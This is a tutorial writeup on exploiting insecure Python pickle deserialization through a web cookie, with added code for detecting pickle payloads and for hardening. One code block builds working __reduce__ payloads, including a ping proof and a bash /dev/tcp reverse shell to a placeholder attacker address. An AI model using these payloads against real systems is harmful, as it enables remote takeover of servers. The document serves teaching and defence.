Insecure Deserialization Attack with Python Pickle
Intro : Hello hackers, this is my new writeup on insecure deserialization. It is a relatively rare finding in web applications, but a dangerous one: the application deserializes untrusted or attacker-controlled data, and that data can be abused to cause a denial of service, execute code, bypass authentication or otherwise subvert the application's logic. Today we will walk through it with a practical demo using Python's pickle module.
What is Serialization :
Serialization is the process of converting complex data structures, such as objects and their fields, into a format that can be sent and received as a sequential stream of bytes.
What is Deserialization :
Deserialization is the process of converting that sequential stream of bytes back into its original object form.
Note : Think of it like sending a number over the wire. The sender turns it into a stream of bytes (serialization) and the receiver turns that stream back into the original value (deserialization). The danger comes when the format, as with Python pickle, lets the bytes describe not only data but also which functions to call in order to rebuild it, so whoever controls the bytes controls what the receiver executes.
Practical Example :
Let's assume we have a web page with a search function.
Then we search for something and capture the request in Burp Suite.
Here in the response there are two Set-Cookie values: one is a CSRF token and the other is something odd-looking. It is actually a Python serialized object (a pickle). When we decode the value we get a complex binary format that contains what we searched for.
We can decode and inspect it with Python's pickle module.
So we can abuse this value, because the same cookie is also sent back with every request. First we have to create our own serialized object that carries a test command.
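The decoding step above, written out as an added example (this is not the writeup's own code). It assumes the cookie is base64-encoded, which the page does not state explicitly; both cookie values below are constructed here for illustration. The point is to inspect the pickle with pickletools, which walks the opcode stream without executing it, because calling pickle.loads on an unknown cookie would run whatever it contains. The same walker also flags GLOBAL / STACK_GLOBAL opcodes, which is how a pickle references a function by name and the tell-tale of a __reduce__ payload.

```python
import base64
import io
import pickle
import pickletools
import subprocess

# Constructed samples (the real application's cookie contents are not known).
# Legitimate cookie: the search state a page like this might pickle.
SAMPLE_STATE = {"search": "test", "page": 1}
SAMPLE_COOKIE = base64.b64encode(pickle.dumps(SAMPLE_STATE)).decode()
# Suspicious cookie: a pickle that references a function by name, which is what
# an attacker-controlled __reduce__ payload leaves behind in the opcode stream.
SUSPICIOUS_COOKIE = base64.b64encode(pickle.dumps(subprocess.check_output)).decode()


def decode_cookie(cookie: str) -> bytes:
    """Base64-decode a cookie value, restoring '=' padding that some apps strip."""
    return base64.b64decode(cookie + "=" * (-len(cookie) % 4))


def looks_like_pickle(data: bytes) -> bool:
    """Fingerprint: protocol 2+ pickles start with 0x80 <protocol> and every
    pickle ends with '.' (the STOP opcode).  Base64 of a protocol 4 pickle
    therefore always starts with 'gASV'."""
    return (data[:1] == b"\x80"
            and data[1:2] in (b"\x02", b"\x03", b"\x04", b"\x05")
            and data[-1:] == b".")


def disassemble(data: bytes) -> str:
    """Opcode listing of the pickle WITHOUT executing it (pickle.loads would)."""
    out = io.StringIO()
    pickletools.dis(data, out=out)
    return out.getvalue()


def referenced_globals(data: bytes) -> list:
    """Return the (module, name) pairs the pickle would import on load.

    GLOBAL (protocols 0-3) carries "module name" as its argument.  STACK_GLOBAL
    (protocol 4+) takes module and name from the two most recently pushed
    strings, which this walker tracks (a heuristic: memo lookups are ignored).
    A plain data pickle yields [].
    """
    found = []
    pushed_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(pushed_strings) >= 2:
            found.append((pushed_strings[-2], pushed_strings[-1]))
        elif opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            pushed_strings.append(arg)
    return found


if __name__ == "__main__":
    for label, cookie in (("legit", SAMPLE_COOKIE), ("suspicious", SUSPICIOUS_COOKIE)):
        raw = decode_cookie(cookie)
        print(f"== {label}: pickle={looks_like_pickle(raw)} globals={referenced_globals(raw)}")
        print(disassemble(raw))
```

When triaging a real cookie, run only decode_cookie, looks_like_pickle, disassemble and referenced_globals against it; anything that calls pickle.loads belongs on a throwaway machine.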
Here is the Code.
Note : First we only check whether there is any code execution at all.
Then we run it and get a new serialized object value.
Then I set up a tcpdump listener and replace the cookie value with the new value we created.
After hitting send I get an ICMP request back, which means code execution is present here.
So I change the Python3 code to a reverse shell payload and run it again.
Then I again replace the cookie value with this new one.
After hitting send, I suddenly get a reverse shell in our netcat listener.
And that's it. This is how it can be exploited. The root cause is that the server calls pickle.loads on a cookie the client controls; pickle will happily resolve and call any function the payload names. The fix is to never unpickle untrusted data: keep client-side state in a format like JSON, or at the very least sign the cookie with an HMAC and verify it before deserializing.
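The payload construction from the steps above, together with the vulnerable server-side call and two hardened alternatives, as an added example (this is not the writeup's own code, which is not reproduced on the page). The attacker address 10.10.14.5, listener port 4444, the base64 cookie encoding and the HMAC secret key are all assumptions made for illustration. The ping and reverse-shell cookies are built exactly as a tester would build them but are never loaded here; a third, benign payload that only sets an environment variable is loaded instead to prove that pickle.loads executes the callable named in the pickle.

```python
import base64
import hashlib
import hmac
import io
import os
import pickle


class PickleRCE:
    """Object whose pickle tells the loader to call func(*args) while rebuilding it.

    pickle honours __reduce__: the callable is serialised as a GLOBAL reference
    and the arguments as ordinary data, so whoever unpickles this runs func(*args).
    """

    def __init__(self, func, *args):
        self.func = func
        self.args = args

    def __reduce__(self):
        return (self.func, self.args)


def craft_cookie(func, *args) -> str:
    """Serialise the payload and base64-encode it for use as a cookie value (assumed format)."""
    return base64.b64encode(pickle.dumps(PickleRCE(func, *args))).decode()


# Stage 1 of the writeup: a ping to prove code execution (attacker IP is a placeholder).
PING_COOKIE = craft_cookie(os.system, "ping -c 1 10.10.14.5")
# Stage 2: a reverse shell (listener address is a placeholder). Never loaded in this file.
REVSHELL_COOKIE = craft_cookie(os.system, "bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'")
# Benign stand-in used below: proves execution by setting an environment variable.
DEMO_COOKIE = craft_cookie(exec, "import os; os.environ['PICKLE_DEMO'] = 'executed'")

# Constructed legitimate state, the kind of thing the search page would store.
LEGIT_STATE = {"search": "test", "page": 1}
LEGIT_COOKIE = base64.b64encode(pickle.dumps(LEGIT_STATE)).decode()
SECRET_KEY = b"constructed-demo-key-do-not-reuse"  # assumption: server-side secret


def vulnerable_load(cookie: str):
    """What the target application is presumed to do: unpickle the cookie as-is."""
    return pickle.loads(base64.b64decode(cookie))


def demo_marker():
    """Evidence that DEMO_COOKIE ran: the variable it sets (None before loading)."""
    return os.environ.get("PICKLE_DEMO")


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every GLOBAL/STACK_GLOBAL, so a __reduce__ payload cannot resolve a callable.

    Plain data (dicts, lists, strings, numbers) never calls find_class and still loads.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load(cookie: str):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(cookie))).load()


def sign(data: bytes, key: bytes) -> str:
    """Append an HMAC-SHA256 tag so the server can tell its own cookies from forged ones."""
    tag = hmac.new(key, data, hashlib.sha256).digest()
    return base64.b64encode(data + tag).decode()


def verify_and_load(cookie: str, key: bytes):
    """Only unpickle after the tag checks out; a modified cookie is rejected before pickle sees it."""
    blob = base64.b64decode(cookie)
    data, tag = blob[:-32], blob[-32:]
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("cookie signature invalid; refusing to unpickle")
    return pickle.loads(data)


SIGNED_COOKIE = sign(pickle.dumps(LEGIT_STATE), SECRET_KEY)
```

The two hardening options are not equal. The restricted unpickler stops __reduce__ payloads outright and is what the Python documentation recommends if pickle must be kept. The HMAC only proves the cookie came from the server, so it still fails the moment the key leaks; for client-held state the honest answer remains JSON plus signing, with pickle kept away from anything the client can send.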
THANKS FOR READING!
If you like it don’t forget to Follow me for more Articles.
Happy Hacking~